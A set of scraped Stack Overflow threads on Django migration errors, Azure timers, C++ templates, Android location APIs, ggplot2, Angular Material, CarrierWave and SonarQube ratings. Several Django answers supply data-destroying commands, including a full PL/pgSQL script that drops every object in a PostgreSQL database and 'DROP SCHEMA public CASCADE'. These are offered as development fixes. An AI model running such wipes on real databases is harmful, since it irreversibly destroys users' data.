If you want create a customer user model which inherit from AbstractUser after that, you will encounter this problem as follow message:
django.db.migrations.exceptions.InconsistentMigrationHistory:
Migration admin.0001_initial is applied before its dependency
account.0001_initial on database 'default'.
finally,
I drop my entire databases and run
A: I encountered this when migrating from Wagtail 2.0 to 2.4, but have seen it a few other times when a third party app squashes a migration after your current version but before the version you’re migrating to.
The shockingly simple solution in this case at least is:
./manage.py migrate
./manage.py makemigrations
./manage.py migrate
i.e. run a single migrate before trying to makemigrations.
A: This Problem will come most of the time if you extend the User Model post initial migration. Because whenever you extend the Abstract user it will create basic fields which were present un the model like email, first_name, etc.
Even this is applicable to any abstract model in django.
So a very simple solution for this is either create a new database then apply migrations or delete [You all data will be deleted in this case.] the same database and reapply migrations.
A: I have to drop my database to and then run makemigrations and migrate again for this to be resolved on my part.
A: delete migrations folder and db.sqlite3 and type in the cmd
python manage.py makemigrations
A: django.db.migrations.exceptions.InconsistentMigrationHistory #On Creating Custom User Model
I had that same issue today, and none of the above solutions worked, then I thought to erase all the data from my local PostgreSQL database using this following command
-- Drop everything from the PostgreSQL database.
DO $$
DECLARE
q TEXT;
r RECORD;
BEGIN
-- triggers
FOR r IN (SELECT pns.nspname, pc.relname, pt.tgname
FROM pg_catalog.pg_trigger pt, pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace AND pc.oid=pt.tgrelid
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pt.tgisinternal=false
) LOOP
EXECUTE format('DROP TRIGGER %I ON %I.%I;',
r.tgname, r.nspname, r.relname);
END LOOP;
-- constraints #1: foreign key
FOR r IN (SELECT pns.nspname, pc.relname, pcon.conname
FROM pg_catalog.pg_constraint pcon, pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace AND pc.oid=pcon.conrelid
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pcon.contype='f'
) LOOP
EXECUTE format('ALTER TABLE ONLY %I.%I DROP CONSTRAINT %I;',
r.nspname, r.relname, r.conname);
END LOOP;
-- constraints #2: the rest
FOR r IN (SELECT pns.nspname, pc.relname, pcon.conname
FROM pg_catalog.pg_constraint pcon, pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace AND pc.oid=pcon.conrelid
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pcon.contype<>'f'
) LOOP
EXECUTE format('ALTER TABLE ONLY %I.%I DROP CONSTRAINT %I;',
r.nspname, r.relname, r.conname);
END LOOP;
-- indicēs
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind='i'
) LOOP
EXECUTE format('DROP INDEX %I.%I;',
r.nspname, r.relname);
END LOOP;
-- normal and materialised views
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind IN ('v', 'm')
) LOOP
EXECUTE format('DROP VIEW %I.%I;',
r.nspname, r.relname);
END LOOP;
-- tables
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind='r'
) LOOP
EXECUTE format('DROP TABLE %I.%I;',
r.nspname, r.relname);
END LOOP;
-- sequences
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind='S'
) LOOP
EXECUTE format('DROP SEQUENCE %I.%I;',
r.nspname, r.relname);
END LOOP;
-- extensions (only if necessary; keep them normally)
FOR r IN (SELECT pns.nspname, pe.extname
FROM pg_catalog.pg_extension pe, pg_catalog.pg_namespace pns
WHERE pns.oid=pe.extnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
) LOOP
EXECUTE format('DROP EXTENSION %I;', r.extname);
END LOOP;
-- aggregate functions first (because they depend on other functions)
FOR r IN (SELECT pns.nspname, pp.proname, pp.oid
FROM pg_catalog.pg_proc pp, pg_catalog.pg_namespace pns, pg_catalog.pg_aggregate pagg
WHERE pns.oid=pp.pronamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pagg.aggfnoid=pp.oid
) LOOP
EXECUTE format('DROP AGGREGATE %I.%I(%s);',
r.nspname, r.proname,
pg_get_function_identity_arguments(r.oid));
END LOOP;
-- routines (functions, aggregate functions, procedures, window functions)
IF EXISTS (SELECT * FROM pg_catalog.pg_attribute
WHERE attrelid='pg_catalog.pg_proc'::regclass
AND attname='prokind' -- PostgreSQL 11+
) THEN
q := 'CASE pp.prokind
WHEN ''p'' THEN ''PROCEDURE''
WHEN ''a'' THEN ''AGGREGATE''
ELSE ''FUNCTION''
END';
ELSIF EXISTS (SELECT * FROM pg_catalog.pg_attribute
WHERE attrelid='pg_catalog.pg_proc'::regclass
AND attname='proisagg' -- PostgreSQL ≤10
) THEN
q := 'CASE pp.proisagg
WHEN true THEN ''AGGREGATE''
ELSE ''FUNCTION''
END';
ELSE
q := '''FUNCTION''';
END IF;
FOR r IN EXECUTE 'SELECT pns.nspname, pp.proname, pp.oid, ' || q || ' AS pt
FROM pg_catalog.pg_proc pp, pg_catalog.pg_namespace pns
WHERE pns.oid=pp.pronamespace
AND pns.nspname NOT IN (''information_schema'', ''pg_catalog'', ''pg_toast'')
' LOOP
EXECUTE format('DROP %s %I.%I(%s);', r.pt,
r.nspname, r.proname,
pg_get_function_identity_arguments(r.oid));
END LOOP;
-- nōn-default schemata we own; assume to be run by a not-superuser
FOR r IN (SELECT pns.nspname
FROM pg_catalog.pg_namespace pns, pg_catalog.pg_roles pr
WHERE pr.oid=pns.nspowner
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast', 'public')
AND pr.rolname=current_user
) LOOP
EXECUTE format('DROP SCHEMA %I;', r.nspname);
END LOOP;
-- voilà
RAISE NOTICE 'Database cleared!';
END; $$;
After this you can run django command for migrations
python manage.py makemigrations
python manage.py migrate
And Absolutely that will work . Thank You.
A: Comment django.contrib.admin from installed apps and also comment path('admin/', admin.site.urls),then rerun makemigrations and then migrate. It will solve your issue. For more info go here
A: These steps can as well work
*
*Drop your entire database
*Make a new migration
These few steps can solve it for you, and I think its best when you have multiple contributors to the sam project.
A: Since you are using a custom User model, you can first comment out
INSTALLED_APPS = [
...
#'django.contrib.admin',
...
]
in your Installed_Apps settings. And also comment
urlpatterns = [
# path('admin/', admin.site.urls)
....
....
]
in your base urls.py
Then run
python manage.py migrate.
When done uncomment
'django.contrib.admin'
and
path('admin/', admin.site.urls)
A: How to solve a weird InconsistentMigrationHistory issue in production
The logs looked like it worked fine:
>>> ./manage migrate
====== Migrations =====
Running migrations:
Applying app.0024_xxx... OK
Applying app.0025_yyy... OK
But then
>>> ./manage migrate
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration app.0025_yyy is applied before its dependency app.0024_xxx on database 'default'.
How to solve?
Change dependency of app.0025_yyy.py manually from 0024_xxx to 0023_prior_migration_name
Then:
>>> ./manage.py makemigrations --merge
Created new merge migration /app/src/app/migrations/0026_merge_20220809_1021.py
>>> ./manage.py migrate
Running migrations:
Applying app.0024_xxx... OK
Applying app.0026_merge_20220809_1021... OK
This solves the issue, but if you do not want to commit your changes you can just revert everything by doing:
>>> ./manage.py migrate app 0023
Running migrations:
Rendering model states... DONE
Unapplying app.0026_merge_20220809_1021... OK
Unapplying app.0024_xxx... OK
Unapplying app.0025_yyy... OK
Revert dependency change of 0025_yyy and delete merge migration.
>>> ./manage migrate
====== Migrations =====
Running migrations:
Applying app.0024_xxx... OK
Applying app.0025_yyy... OK
A: In my case, I was also using a custom user. the following steps work for me.
1 - delete all migrations and database tables (If you have testing data !!!!).
2 - Run migrations for the custom user app.
python manage.py makemigrations customAuth
python manage.py migrate customAuth
3 - Then run migration for the project level.
python manage.py makemigrations
python manage.py migrate
A: first of all backup your data. (copy your db file).
delete sqlite.db and also the migration folder.
then, run these commands:
./manage.py makemigrations APP_NAME
./manage.py migrate APP_NAME
after deleting the DB file and migration folder make sure that write the application name after the migration commands.
A: Okay, before you do anything weird or nuclear, first just drop your database and rebuild it.
If using POsgres -
DROP SCHEMA public CASCADE;
CREATE SCHEMA PUBLIC;
Then just remake your migrations
./manage.py migrate
This is the most basic solution, which typically will clear things up. Don't just go remaking the migrations until absolutely neccessary.
| stackoverflow | {
"language": "en",
"length": 3684,
"provenance": "stackexchange_0000F.jsonl.gz:899952",
"question_score": "166",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651760"
} |
c973c08040596881d2e45ae7a4041a5bd485c3a6 | Stackoverflow Stackexchange
Q: Running Azure Web job on a timer If a web job takes more than the interval between runs , will azure start a new instance or it will wait until the job is complete to start it again ?
A: It will wait until the job is completed. We could get answer from TimerTrigger. The following the snippet from the document.
If your function execution takes longer than the timer interval, another execution won't be triggered until after the current invocation completes. The next execution is scheduled after the current execution completes.
| Q: Running Azure Web job on a timer If a web job takes more than the interval between runs , will azure start a new instance or it will wait until the job is complete to start it again ?
A: It will wait until the job is completed. We could get answer from TimerTrigger. The following the snippet from the document.
If your function execution takes longer than the timer interval, another execution won't be triggered until after the current invocation completes. The next execution is scheduled after the current execution completes.
| stackoverflow | {
"language": "en",
"length": 93,
"provenance": "stackexchange_0000F.jsonl.gz:899958",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651810"
} |
e87de1f4b1362bbcc13f7bcd7bc3919ef1a359a8 | Stackoverflow Stackexchange
Q: template identifier vs decltype in template function parameter type What do you consider as better?
template <typename T> void func(T x,T y) {}
or
template <typename T> void func(T x,decltype(x) y) {}
IMHO, the second form seems preferable because the link in between the types of x and y is explicit, and at least when renaming the template identifier things seems less error-prone.
EDIT
Second form let you call the function with a subtype of the one use for the first parameter, while the first form needs the exact same types. This argument seems slightly better than previous one.
A: They are semantically different, so it depends on what you want to achieve. The second is more restrictive than the first. Consider:
template <typename T> void func1(T x, decltype(x) y) {}
template <typename T> void func2(T x, T y) {}
func1(2., 4); // converts 4 to double
func2(2., 4); // fails to compile
In SFINAE contexts it can lead to different compile-time behavior (not necessarely a compilation error), and the two options indirectly can compile to different programs.
| Q: template identifier vs decltype in template function parameter type What do you consider as better?
template <typename T> void func(T x,T y) {}
or
template <typename T> void func(T x,decltype(x) y) {}
IMHO, the second form seems preferable because the link in between the types of x and y is explicit, and at least when renaming the template identifier things seems less error-prone.
EDIT
Second form let you call the function with a subtype of the one use for the first parameter, while the first form needs the exact same types. This argument seems slightly better than previous one.
A: They are semantically different, so it depends on what you want to achieve. The second is more restrictive than the first. Consider:
template <typename T> void func1(T x, decltype(x) y) {}
template <typename T> void func2(T x, T y) {}
func1(2., 4); // converts 4 to double
func2(2., 4); // fails to compile
In SFINAE contexts it can lead to different compile-time behavior (not necessarely a compilation error), and the two options indirectly can compile to different programs.
A: Both forms don't mean exactly the same. The second one is non-deduced.
The first one also won't allow implicit conversions (not only subtypes) on one of the arguments, because then it won't be able to unify the expected type (say int) with the type to convert (let's say float): See on coliru.
| stackoverflow | {
"language": "en",
"length": 232,
"provenance": "stackexchange_0000F.jsonl.gz:899976",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651860"
} |
180f44c489b145cbc2d8ccc9fa8c71c20d618ef5 | Stackoverflow Stackexchange
Q: Cannot Resolve Symbol: FusedLocationProviderClient. Google play services version used 11.0.1
Cannot Resolve Symbol: FusedLocationProviderClient.
Google play services version used 11.0.1.
code : while declaration
private FusedLocationProviderClient mfusedLocationProviderclient;
A: Import following lines to the code after you have changed the build.gradle(Mudule:app) including implementation:
"com.google.android.gms:play-services-location:11.0.1"
import com.google.android.gms.location.FusedLocationProviderClient;
import com.google.android.gms.location.LocationServices;
| Q: Cannot Resolve Symbol: FusedLocationProviderClient. Google play services version used 11.0.1
Cannot Resolve Symbol: FusedLocationProviderClient.
Google play services version used 11.0.1.
code : while declaration
private FusedLocationProviderClient mfusedLocationProviderclient;
A: Import following lines to the code after you have changed the build.gradle(Mudule:app) including implementation:
"com.google.android.gms:play-services-location:11.0.1"
import com.google.android.gms.location.FusedLocationProviderClient;
import com.google.android.gms.location.LocationServices;
A: This Developer Guide solved my problem
A: You just need to include this in your build.gradle file:
compile 'com.google.android.gms:play-services-location:12.0.1'
Code for retrieve Location :
FusedLocationProviderClient mFusedLocationClient = LocationServices.getFusedLocationProviderClient(this);
mFusedLocationClient.getLastLocation()
.addOnSuccessListener(this, new OnSuccessListener<Location>() {
@Override
public void onSuccess(Location location) {
// Got last known location. In some rare situations this can be null.
}
})
.addOnFailureListener(this, new OnFailureListener() {
@Override
public void onFailure(@NonNull Exception e) {
}
});
A: In build.gradle (Module: app) add:
dependencies {
...
implementation 'com.google.android.gms:play-services-location:17.0.0'
...
}
Don't forget to sync the build.gradle (on the up right corner of the build.gradle, you will have a notification to sync the changes, click it).
A: In my case, I should include
com.google.android.gms:play-services-location:11.4.0
Not just play-services-maps:11.4.0.
A: Add COARSE_PERMISSION in manifest.xml file.
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
then it automatic detects the Class and imports it.
A: You just need to include this in your build.gradle file:
implementation "com.google.android.gms:play-services-location:15.0.1"
or if you're not using latest gradle version:
compile "com.google.android.gms:play-services-location:15.0.1"
Note: It's recommended to use Google Play services version 15.0.1 or higher, which includes bug fixes for this class. More details here.
https://developers.google.com/android/reference/com/google/android/gms/location/FusedLocationProviderClient
A: In your build.gradle (Module: app), you need to add the following dependency:
dependencies {
//...
compile 'com.google.android.gms:play-services:11.0.0'
}
and rebuild your app so it can download the needed dependencies. The class FusedLocationProviderClient is included in this package.
A: I know it is very late, but happy to answer the question.
Use this dependencies
compile 'com.google.android.gms:play-services-location:11.0.4'
and refer this link - https://guides.codepath.com/android/Retrieving-Location-with-LocationServices-API
A: You just need to include this in your build.gradle file:
compile 'com.google.android.gms:play-services-location:11.0.2'
version of the services for location and maps should be the same.
compile 'com.google.android.gms:play-services-maps:11.0.2'
A: update your google play services to 11.8.0
The code that should be added to the bulild file is as follows
compile 'com.google.android.gms:play-services-gcm:11.8.0'
A: As everyone replied you need to put into your build.gradle file the line :
implement 'com.google.android.gms:play-services-location:11.0.1'
(substituting implement for compile depending on your gradle version)
The version just needs to be above 11.0.1, apparently.
However, when I did this I had a new error. Since I was already implementing the Play Service libraries (analytics, auth, maps, location) in a previous version (10.0.1) I had to change these all to the new version - you cant have only one of the libraries at a different version, need to have them all matching.
So I found the implement lines with these libraries and changed them to:
implementation group: 'com.google.android.gms', name: 'play-services-analytics', version: '11.0.1'
implementation group: 'com.google.android.gms', name: 'play-services-auth', version: '11.0.1'
implementation group: 'com.google.android.gms', name: 'play-services-maps', version: '11.0.1'
implementation group: 'com.google.android.gms', name: 'play-services-location', version: '11.0.1'
Since I was also implementing firebase (not even sure what this is for and why it is related to Play Services), I had to the similar thing:
implementation group: 'com.google.firebase', name: 'firebase-core', version: '11.0.1'
implementation group: 'com.google.firebase', name: 'firebase-crash', version: '11.0.1'
Sync your project with gradle files and your FusedLocationProviderClient should be visible/available, starting at the import:
import com.google.android.gms.location.FusedLocationProviderClient;
| stackoverflow | {
"language": "en",
"length": 532,
"provenance": "stackexchange_0000F.jsonl.gz:899990",
"question_score": "85",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651889"
} |
02c3781b0cb83858d75610aec9fd3db8a9f1a361 | Stackoverflow Stackexchange
Q: Launching speech preferences pane on macOS Sierra Is it possible to launch preferences pane with Accessibility/Speech open on macOS Sierra? For accessibility I am aware you can do that with x-apple.systempreferences:com.apple.preference.universalaccess. I am also aware that most tabs in Accessiblity pane can be opened when launched, but there is no document for whether it is possible for Speech tab on Sierra. This is the most comprehensive link I have found thus far: https://macosxautomation.com/system-prefs-links.html, but it predates Sierra and speech belonged to different pane then, so it is listed but that link isn't useful.
A: You're looking for x-apple.systempreferences:com.apple.preference.universalaccess?TextToSpeech
The anchors for the pane can be retrieved by opening it and then querying the app with applescript:
tell application "System Preferences" to get anchors of current pane
Which returns:
"Keyboard"
"Dwell"
"Captioning"
"Seeing_VoiceOver"
"SpeakableItems"
"TextToSpeech"
"Hearing"
"Switch"
"General"
"Media_Descriptions"
"Mouse"
"Seeing_Display"
"Seeing_Zoom"
| Q: Launching speech preferences pane on macOS Sierra Is it possible to launch preferences pane with Accessibility/Speech open on macOS Sierra? For accessibility I am aware you can do that with x-apple.systempreferences:com.apple.preference.universalaccess. I am also aware that most tabs in Accessiblity pane can be opened when launched, but there is no document for whether it is possible for Speech tab on Sierra. This is the most comprehensive link I have found thus far: https://macosxautomation.com/system-prefs-links.html, but it predates Sierra and speech belonged to different pane then, so it is listed but that link isn't useful.
A: You're looking for x-apple.systempreferences:com.apple.preference.universalaccess?TextToSpeech
The anchors for the pane can be retrieved by opening it and then querying the app with applescript:
tell application "System Preferences" to get anchors of current pane
Which returns:
"Keyboard"
"Dwell"
"Captioning"
"Seeing_VoiceOver"
"SpeakableItems"
"TextToSpeech"
"Hearing"
"Switch"
"General"
"Media_Descriptions"
"Mouse"
"Seeing_Display"
"Seeing_Zoom"
A: https://support.apple.com/kb/PH25806?viewlocale=en_US&locale=en_US, with title
macOS Sierra: Speech pane of Accessibility System Preferences
indicates that the speech pane is still there.
Use the Speech pane of Accessibility System Preferences to customize the system voice, be notified when an alert or app needs your attention, and set a shortcut to speak selected text.
To open this pane, choose Apple menu > System Preferences, click Accessibility, then click Speech.
| stackoverflow | {
"language": "en",
"length": 208,
"provenance": "stackexchange_0000F.jsonl.gz:899991",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651894"
} |
f4fe37f2b1d27a23ef7b07b61aa42cd43727d532 | Stackoverflow Stackexchange
Q: Remove uploaded images rails 4 carrierwave Trying to remove uploaded images using carrierwave
<%= f.fields_for :images do |ff| %>
<div class="form-group">
<label>
<%= ff.check_box :remove_image %>
<%= image_tag ff.object.image %>
</label>
</div>
<% end %>
Getting such params in controller
"images_attributes"=>{"0"=>{"remove_image"=>"0", "id"=>"13"}, "1"=>{"remove_image"=>"1", "id"=>"14"}, "2"=>{"remove_image"=>"0", "id"=>"15"}, "3"=>{"remove_image"=>"0", "id"=>"16"}, "4"=>{"remove_image"=>"0", "id"=>"17"}, "5"=>{"remove_image"=>"0", "id"=>"18"}}}
But when updating an object with these params nothing happens, what am I missing?
update
def update
@country = Country.find(params[:id])
if @country.update(country_params)
flash[:notice] = 'Country is successfully updated.'
redirect_to edit_admin_country_path
else
flash[:error] = @country.errors.full_messages[0]
render 'edit'
end
end
def country_params
permitted = [{images_attributes: ["image", "@original_filename", "@content_type", "@headers", "_destroy", "id", "remove_image"]}]
params.require(:country).permit(*permitted)
end
class Country < ActiveRecord::Base
has_many :images
....
end
class Image < ActiveRecord::Base
mount_uploader :image, ImageUploader
belongs_to :country
end
A: your form looks good but you are missing the controller action
mine looks like:
class ImageController < ApplicationController
...
def update
@image = Image.find(params[:id])
...
if params[:images][:remove_image].present?
@image.remove_image!
end
@image.save
end
end
If you want to remove the file manually, you can call remove_avatar!, then save the object.
| Q: Remove uploaded images rails 4 carrierwave Trying to remove uploaded images using carrierwave
<%= f.fields_for :images do |ff| %>
<div class="form-group">
<label>
<%= ff.check_box :remove_image %>
<%= image_tag ff.object.image %>
</label>
</div>
<% end %>
Getting such params in controller
"images_attributes"=>{"0"=>{"remove_image"=>"0", "id"=>"13"}, "1"=>{"remove_image"=>"1", "id"=>"14"}, "2"=>{"remove_image"=>"0", "id"=>"15"}, "3"=>{"remove_image"=>"0", "id"=>"16"}, "4"=>{"remove_image"=>"0", "id"=>"17"}, "5"=>{"remove_image"=>"0", "id"=>"18"}}}
But when updating an object with these params nothing happens, what am I missing?
update
def update
@country = Country.find(params[:id])
if @country.update(country_params)
flash[:notice] = 'Country is successfully updated.'
redirect_to edit_admin_country_path
else
flash[:error] = @country.errors.full_messages[0]
render 'edit'
end
end
def country_params
permitted = [{images_attributes: ["image", "@original_filename", "@content_type", "@headers", "_destroy", "id", "remove_image"]}]
params.require(:country).permit(*permitted)
end
class Country < ActiveRecord::Base
has_many :images
....
end
class Image < ActiveRecord::Base
mount_uploader :image, ImageUploader
belongs_to :country
end
A: your form looks good but you are missing the controller action
mine looks like:
class ImageController < ApplicationController
...
def update
@image = Image.find(params[:id])
...
if params[:images][:remove_image].present?
@image.remove_image!
end
@image.save
end
end
If you want to remove the file manually, you can call remove_avatar!, then save the object.
| stackoverflow | {
"language": "en",
"length": 172,
"provenance": "stackexchange_0000F.jsonl.gz:900015",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651969"
} |
14bf6d0179e4ac8fe9e6cccaa14548d28d9d1a88 | Stackoverflow Stackexchange
Q: Adding legend to geom_rect in R ggplot2 Consider a dataset as in this question. A shading can be plotted using geom_rect in ggplot2 as follows.
data <- structure(list(Time = c(20L, 40L, 60L, 80L, 100L, 120L, 20L,
40L, 60L, 80L, 100L), Average = c(5.8, 6.1, 6.4, 6.7, 7, 7.7,
8.47, 9.317, 10.2487, 11.27357, 12.40093), Test = structure(c(2L,
2L, 2L, 2L, 2L, 2L, 1L, 1L, 1L, 1L, 1L), .Label = c("Control",
"Exp"), class = "factor"), n = c(9L, 9L, 9L, 9L, 9L, 9L, 9L,
9L, 9L, 9L, 9L), se = c(0.12, 0.145, 0.188, 0.99, 0.44, 0.32,
0.5, 0.88, 0.9, 0.33, 0.456)), .Names = c("Time", "Average",
"Test", "n", "se"), class = "data.frame", row.names = c("1",
"2", "3", "4", "5", "6", "7", "8", "9", "10", "11")
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf),fill="pink",colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point()
How to add a legend for the shading ?
A: We can insert the fill inside the aess and give it a scale:
library(ggplot2)
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf,fill="What"),colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point() +
scale_fill_manual('Highlight this',
values = 'pink',
guide = guide_legend(override.aes = list(alpha = 1)))
| Q: Adding legend to geom_rect in R ggplot2 Consider a dataset as in this question. A shading can be plotted using geom_rect in ggplot2 as follows.
data <- structure(list(Time = c(20L, 40L, 60L, 80L, 100L, 120L, 20L,
40L, 60L, 80L, 100L), Average = c(5.8, 6.1, 6.4, 6.7, 7, 7.7,
8.47, 9.317, 10.2487, 11.27357, 12.40093), Test = structure(c(2L,
2L, 2L, 2L, 2L, 2L, 1L, 1L, 1L, 1L, 1L), .Label = c("Control",
"Exp"), class = "factor"), n = c(9L, 9L, 9L, 9L, 9L, 9L, 9L,
9L, 9L, 9L, 9L), se = c(0.12, 0.145, 0.188, 0.99, 0.44, 0.32,
0.5, 0.88, 0.9, 0.33, 0.456)), .Names = c("Time", "Average",
"Test", "n", "se"), class = "data.frame", row.names = c("1",
"2", "3", "4", "5", "6", "7", "8", "9", "10", "11")
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf),fill="pink",colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point()
How to add a legend for the shading ?
A: We can insert the fill inside the aess and give it a scale:
library(ggplot2)
ggplot(data, aes(x=Time, y=Average, colour=Test)) +
geom_rect(aes(xmin=20,xmax=30,ymin=-Inf,ymax=Inf,fill="What"),colour=NA,alpha=0.05) +
geom_errorbar(aes(ymin=Average-se, ymax=Average+se), width=0.2) +
geom_line() +
geom_point() +
scale_fill_manual('Highlight this',
values = 'pink',
guide = guide_legend(override.aes = list(alpha = 1)))
| stackoverflow | {
"language": "en",
"length": 188,
"provenance": "stackexchange_0000F.jsonl.gz:900108",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652257"
} |
cb8148f98333691b70a49cccb2ff96ae147a8d89 | Stackoverflow Stackexchange
Q: Manipulating Angular Material Input Form Styling I am new to Angular and Angular Material (AM). By default, AM Input Component shows the primary color of your palette until you click on the form, where then it changes the placeholder value and marker line to the accent color. Is there a way to manipulate the form so that the accent color is always showing? In other words, the form will always be highlighted. The issue is that my primary color is dark, and my website page background is also dark, therefore, the placeholder and marker line are barely visible unless the form is clicked on by the user. This would also be a nice color addition to my site's page.
Here is the sample of the required html from the AM docs:
<md-input-container>
<input mdInput placeholder="Favorite food" value="Sushi">
</md-input-container>
You can add color="accent" to the input line, but again, the color only appears when the form is clicked on by the user.
Thank you in advance.
A: You can add following in your component's css file:
/deep/ .mat-input-underline {
background-color: #FF0000; /* replace this color with your accent color hex code */
}
demo
| Q: Manipulating Angular Material Input Form Styling I am new to Angular and Angular Material (AM). By default, AM Input Component shows the primary color of your palette until you click on the form, where then it changes the placeholder value and marker line to the accent color. Is there a way to manipulate the form so that the accent color is always showing? In other words, the form will always be highlighted. The issue is that my primary color is dark, and my website page background is also dark, therefore, the placeholder and marker line are barely visible unless the form is clicked on by the user. This would also be a nice color addition to my site's page.
Here is the sample of the required html from the AM docs:
<md-input-container>
<input mdInput placeholder="Favorite food" value="Sushi">
</md-input-container>
You can add color="accent" to the input line, but again, the color only appears when the form is clicked on by the user.
Thank you in advance.
A: You can add following in your component's css file:
/deep/ .mat-input-underline {
background-color: #FF0000; /* replace this color with your accent color hex code */
}
demo
A: Every HTML Element generated from a Angular Material component gets a class mat- css class assigned to it. They can be used for styling.
The input component as you are talking about has some nested elements, so you have to decide where you want to apply your styling.
To set styling to the whole input wrapper use:
.mat-input-wrapper {
background: gray;
}
Inspect the generated html to see classes for the more nested elements - such as mat-input-element
A: You can use the css selector you use below:
/deep/ .mat-input-underline {
background-color: white;
}
The /deep/ combinator is slated for deprecation in Angular, so its best to do without it. Unfortunately, the .mat-input-underline from Angular Material is highly specified, which makes it very difficult to override without using /deep/
The best way I have found is to use an ID, which allows you a higher specificity compared to the default Angular Material styles.
<form id="food-form" [formGroup]="form" (ngSubmit)="submit()">
<mat-input-container>
<input matInput placeholder="Favorite food" value="Sushi">
</mat-input-container>
Then, your 'food-form' id can be used to target this form in the global.scss file. It can't be targeted from the component.scss without breaking your view encapsulation. If you don't use /deep/ the .mat-form-field-underline has to be changed at the global level. The ripple is the color used when selecting the input.
#food-form {
.mat-form-field-underline {
background-color: $accent;
}
.mat-form-field-ripple {
background-color: $accent;
}
}
I hope the Angular Material team pulls back their specificity in the future because currently there's no easy way to override their defaults.
A: I had a similar problem adjusting with width of my form field. When investigating found that the answer that referenced Nehal's answer is correct, but also deprecated in the latest version, 5.0.0-rcX, https://angular.io/guide/component-styles. I continued to double check my CSS selectors but found I needed to change the ViewEncapsulation.
What worked for me was in my css/scss file (of course modify with your own selectors as needed):
mat-input-container {
// Your CSS here
}
And in my components ts file:
@Component({
selector: 'my-component-selector',
templateUrl: './my-component.component.html',
styleUrls: ['./my-component.component.scss'],
encapsulation: ViewEncapsulation.None
})
Without changing the encapsulation, the CSS selector would not get applied.
Good luck!
A: The above solutions didn't work for me...I understand that angular material changes their class names and styles often. I had to do this in my global style.css
.mat-form-field-underline {
background-color: rgb(177, 140, 81) !important;
}
.mat-form-field-underline.mat-disabled {
background-color: transparent !important;
}
A: CSS
input[class~="bg-transparente"] {
background-color: transparent;
}
and in your input, do this
HTML
<input matInput class="bg-transparente">
| stackoverflow | {
"language": "en",
"length": 610,
"provenance": "stackexchange_0000F.jsonl.gz:900174",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652449"
} |
39fd01b85f3318e0e93f73238ed1cf1593f2f529 | Stackoverflow Stackexchange
Q: How SonarQube A, B C,D and E Rating Calculated? On Project Dashbord you see below on different attributes.
"D"
Security Rating on New Code
is worse than A
"C"
Reliability Rating on New Code
is worse than A
Do we have measure criteria documented ?
A: Documented? Why, yes. Yes they are: https://docs.sonarqube.org/latest/user-guide/metric-definitions/
Specifically, Security and Reliability ratings are based on the severity of the worst open issue in that domain:
*
*E - Blocker
*D - Critical
*C - Major
*B - Minor
*A - Info or no open issues
For Maintainability the rating is based on the ratio of the size of the code base to the estimated time to fix all open Maintainability issues:
*
*<=5% of the time that has already gone into the application, the rating is A
*between 6 to 10% the rating is a B
*between 11 to 20% the rating is a C
*between 21 to 50% the rating is a D
*anything over 50% is an E
The size of the code base is calculated by the number of lines where
The value of the cost to develop a line of code is 0.06 days.
| Q: How SonarQube A, B C,D and E Rating Calculated? On Project Dashbord you see below on different attributes.
"D"
Security Rating on New Code
is worse than A
"C"
Reliability Rating on New Code
is worse than A
Do we have measure criteria documented ?
